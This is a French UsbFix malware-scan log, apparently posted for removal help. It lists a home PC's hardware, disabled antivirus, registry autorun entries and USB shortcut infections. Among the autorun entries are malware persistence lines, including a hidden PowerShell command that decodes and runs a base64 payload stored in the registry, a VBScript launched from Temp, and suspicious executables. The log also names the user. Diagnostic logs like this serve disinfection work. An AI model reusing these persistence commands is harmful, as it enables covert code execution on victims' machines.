cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

[b]############################## | UsbFix V 7.184 | [Recherche][/b]

Utilisateur: Angele OUIYA (Administrateur) # ANGELEOUIYA-PC
Mis à jour le 20/10/2014 par El Desaparecido - SosVirus
Lancé à 18:07:02 | 18/04/2017

Site Web : [url=http://www.usbfix.net/]http://www.usbfix.net/[/url]
Changelog : [url=http://www.usbfix.net/maj/]http://www.usbfix.net/maj/[/url]
Assistance : [url=http://www.sosvirus.net/forum-virus-securite.html]http://www.sosvirus.net/forum-virus-securite.html[/url]
Upload Malware : [url=http://www.sosvirus.net/upload_malware.php]http://www.sosvirus.net/upload_malware.php[/url]
Détection en Live : [url=http://comment-supprimer.fr/]http://comment-supprimer.fr/[/url]
Contact : [url=http://www.usbfix.net/contact/]http://www.usbfix.net/contact/[/url]

[b]################## | System information |[/b]

MB: Quanta (3627)
CPU: Intel(R) Core(TM)2 Duo CPU T6600 @ 2.20GHz
GC: Mobile Intel(R) 4 Series Express Chipset Family
RAM -> [Total : 3999 Mo | Free : 1360 Mo]
Bios: Hewlett-Packard
Boot: Normal boot

OS: Microsoft™ Windows 7 Home Premium (6.1.7601 64-Bit) Service Pack 1
WB: Internet Explorer : 11.00.9600.16428
WB: Google Chrome : 57.0.2987.133

[b]################## | Security Information |[/b]

AV: avast! Antivirus [[b](!) Désactivé[/b] |[b](!) Non à jour[/b]]
AS: Windows Defender [Actif |[b](!) Non à jour[/b]]
AS: avast! Antivirus [[b](!) Désactivé[/b] |[b](!) Non à jour[/b]]
FW: avast! Antivirus [[b](!) Désactivé[/b]]
FW: Windows Firewall [Actif]
SC: Security Center [Actif]
WU: Windows Update [Actif]

[b]################## | Disk Information |[/b]

C:\ (%SystemDrive%) -> Disque fixe # 243 Go (147 Go libre(s) - 61%) [OS7] # NTFS
D:\ -> Disque fixe # 13 Go (2 Go libre(s) - 17%) [RECOVERY] # NTFS
F:\ -> Disque fixe # 10 Go (6 Go libre(s) - 60%) [Pas Toucher] # NTFS
G:\ -> Disque fixe # 199 Go (33 Go libre(s) - 16%) [Données 1] # NTFS
H:\ -> Disque amovible # 7 Go (7 Go libre(s) - 100%) [] # FAT32
I:\ -> Disque amovible # 121 Mo (7 Mo libre(s) - 6%) [ANGÈLE] # FAT32

[b]################## | Regedit Run |[/b]

F2 - HKLM\..\Winlogon : [Shell] explorer.exe
F2 - [x64] HKLM\..\Winlogon : [Shell] explorer.exe
F2 - HKLM\..\Winlogon : [Userinit] userinit.exe
F2 - [x64] HKLM\..\Winlogon : [Userinit] C:\Windows\system32\userinit.exe,
04 - HKCU\..\Run : [LightScribe Control Panel] C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
04 - HKCU\..\Run : [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\MESSEN~1\YahooMessenger.exe" -quiet
04 - HKCU\..\Run : [Gestionnaire Antidote.exe] C:\Program Files (x86)\Druide\Antidote\Gestionnaire Antidote.exe
04 - HKCU\..\Run : [swg] "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
04 - HKCU\..\Run : [EPSON Stylus CX4400 Series] C:\Windows\system32\spool\DRIVERS\x64\3\E_IATICAA.EXE /FU "C:\Users\ANGELE~1\AppData\Local\Temp\E_SED0C.tmp" /EF "HKCU"
04 - HKCU\..\Run : [SuperCopier2.exe] C:\Program Files (x86)\SuperCopier2\SuperCopier2.exe
04 - HKCU\..\Run : [Search Protection] C:\Program Files (x86)\Yahoo!\Search Protection\SearchProtection.exe
04 - HKCU\..\Run : [PhotoJoy] C:\Program Files (x86)\PhotoJoy\bin\PhotoJoy.exe /c
04 - HKCU\..\Run : [msnmsgr] "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
04 - HKCU\..\Run : [KiesHelper] C:\Program Files (x86)\Samsung\Kies\KiesHelper.exe /s
04 - HKCU\..\Run : [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
04 - HKCU\..\Run : [KiesPDLR] C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\KiesPDLR.exe
04 - HKCU\..\Run : [SDP] C:\Program Files (x86)\FilesFrog Update Checker\update_checker.exe /auto
04 - HKCU\..\Run : [feielo] C:\Users\Angele OUIYA\feielo.exe /H
04 - HKCU\..\Run : [Advanced Woman Calendar] "C:\Program Files (x86)\Advanced Woman Calendar\WomanCalendar.exe" -m
04 - HKCU\..\Run : [IDMan] C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
04 - HKCU\..\Run : [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
04 - HKCU\..\Run : [updat] wscript.exe //B "C:\Users\ANGELE~1\AppData\Local\Temp\updat.vbs"
04 - HKCU\..\Run : [{E4F9986F-B279-4A88-8BA9-18D76F2CF6B9}] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\eRclLYcr').UDKIAXPSU)));
04 - HKLM\..\Run : [HPCam_Menu] "c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\Hewlett-Packard\Media\Webcam" UpdateWithCreateOnce "Software\Hewlett-Packard\Media\Webcam"
04 - HKLM\..\Run : [QlbCtrl.exe] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
04 - HKLM\..\Run : [UpdatePRCShortCut] "C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Hewlett-Packard\Recovery" UpdateWithCreateOnce "Software\CyberLink\PowerRecover"
04 - HKLM\..\Run : [WirelessAssistant] C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
04 - HKLM\..\Run : [QuickTime Task] "C:\Program Files (x86)\QuickTime\qttask.exe" -atboottime
04 - HKLM\..\Run : [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
04 - HKLM\..\Run : [NBKeyScan] "C:\Program Files (x86)\Nero\Nero BackItUp 4\NBKeyScan.exe"
04 - HKLM\..\Run : [YSearchProtection] "C:\Program Files (x86)\Yahoo!\Search Protection\SearchProtection.exe"
04 - HKLM\..\Run : [ApnUpdater] "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
04 - HKLM\..\Run : [facemoods] "C:\Program Files (x86)\facemoods.com\facemoods\1.4.17.11\facemoodssrv.exe" /md I
04 - HKLM\..\Run : [DATAMNGR] C:\PROGRA~2\SEARCH~1\Datamngr\DATAMN~1.EXE
04 - HKLM\..\Run : [VDownloader] C:\Program Files (x86)\VDownloader\VDownloader.exe /silent
04 - HKLM\..\Run : [Sweetpacks Communicator] C:\Program Files (x86)\SweetIM\Communicator\SweetPacksUpdateManager.exe
04 - HKLM\..\Run : [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
04 - HKLM\..\Run : [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
04 - HKLM\..\Run : [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
04 - HKLM\..\Run : [HPUsageTrackingLEDM] "C:\Program Files (x86)\HP\HP UT LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\"
04 - HKLM\..\Run : [{2EB25CE5-0F84-4B65-AFB4-4360BECDEDC1}] "C:\Program Files (x86)\Airtel Internet\UUShell.exe" /CallBySystem
04 - HKLM\..\Run : [CancelAutoPlay] "C:\Program Files (x86)\Airtel Internet\CancelAutoPlay.exe" run
04 - HKLM\..\Run : [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
04 - HKLM\..\Policies\Explorer\run : [1811855875] C:\ProgramData\mscne.exe
04 - [x64] HKLM\..\Run : [SynTPEnh] %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
04 - [x64] HKLM\..\Run : [SmartMenu] C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background
04 - [x64] HKLM\..\Run : [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
04 - [x64] HKLM\..\Run : [IgfxTray] C:\Windows\system32\igfxtray.exe
04 - [x64] HKLM\..\Run : [HotKeysCmds] C:\Windows\system32\hkcmd.exe
04 - [x64] HKLM\..\Run : [Persistence] C:\Windows\system32\igfxpers.exe
04 - [x64] HKLM\..\Run : [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
04 - [x64] HKLM\..\Run : [VDownloader] C:\Program Files\VDownloader\VDownloader.exe /silent
04 - [x64] HKLM\..\Policies\Explorer\run : [1811855875] C:\ProgramData\mscne.exe
04 - HKU\S-1-5-19\..\Run : [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
04 - HKU\S-1-5-20\..\Run : [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [LightScribe Control Panel] C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\MESSEN~1\YahooMessenger.exe" -quiet
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [Gestionnaire Antidote.exe] C:\Program Files (x86)\Druide\Antidote\Gestionnaire Antidote.exe
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [swg] "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [EPSON Stylus CX4400 Series] C:\Windows\system32\spool\DRIVERS\x64\3\E_IATICAA.EXE /FU "C:\Users\ANGELE~1\AppData\Local\Temp\E_SED0C.tmp" /EF "HKCU"
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [SuperCopier2.exe] C:\Program Files (x86)\SuperCopier2\SuperCopier2.exe
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [Search Protection] C:\Program Files (x86)\Yahoo!\Search Protection\SearchProtection.exe
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [PhotoJoy] C:\Program Files (x86)\PhotoJoy\bin\PhotoJoy.exe /c
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [msnmsgr] "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [KiesHelper] C:\Program Files (x86)\Samsung\Kies\KiesHelper.exe /s
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [KiesPDLR] C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\KiesPDLR.exe
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [SDP] C:\Program Files (x86)\FilesFrog Update Checker\update_checker.exe /auto
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [feielo] C:\Users\Angele OUIYA\feielo.exe /H
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [Advanced Woman Calendar] "C:\Program Files (x86)\Advanced Woman Calendar\WomanCalendar.exe" -m
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [IDMan] C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [updat] wscript.exe //B "C:\Users\ANGELE~1\AppData\Local\Temp\updat.vbs"
04 - HKU\S-1-5-21-2110722252-3502127745-55028577-1001\..\Run : [{E4F9986F-B279-4A88-8BA9-18D76F2CF6B9}] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\eRclLYcr').UDKIAXPSU)));
04 - HKU\S-1-5-18\..\Run : [Gestionnaire Antidote.exe] C:\Program Files (x86)\Druide\Antidote\Gestionnaire Antidote.exe
04 - HKU\S-1-5-19\..\RunOnce : [mctadmin] C:\Windows\System32\mctadmin.exe
04 - HKU\S-1-5-20\..\RunOnce : [mctadmin] C:\Windows\System32\mctadmin.exe

[b]################## | Recherche générique |[/b]

Présent! H:\Removable Drive (8GB).lnk
Présent! I:\Skypee\AutoIt3.exe
Présent! I:\Skypee

[b]################## | Registre |[/b]


[b]################## | UsbFix - Information |[/b]

Info : [url=https://www.youtube.com/watch?v=vUZYYASd7FE]Comment supprimer l'infection des raccourcis sur USB ? (Video)[/url]
Info : [url=http://www.en.usbfix.net/2014/03/remove-shortcut-virus-usb/]L'infection des raccourcis USB, c'est quoi ?[/url]

[b]################## | Hijack |[/b]

Hijacked! [SHD] H:\ 

[b]################## | E.O.F | [url=http://www.sosvirus.net/]http://www.sosvirus.net/[/url] | [url=http://www.usbfix.net/]http://www.usbfix.net/[/url] |[/b]

Publicité


Signaler le contenu de ce document

Publicité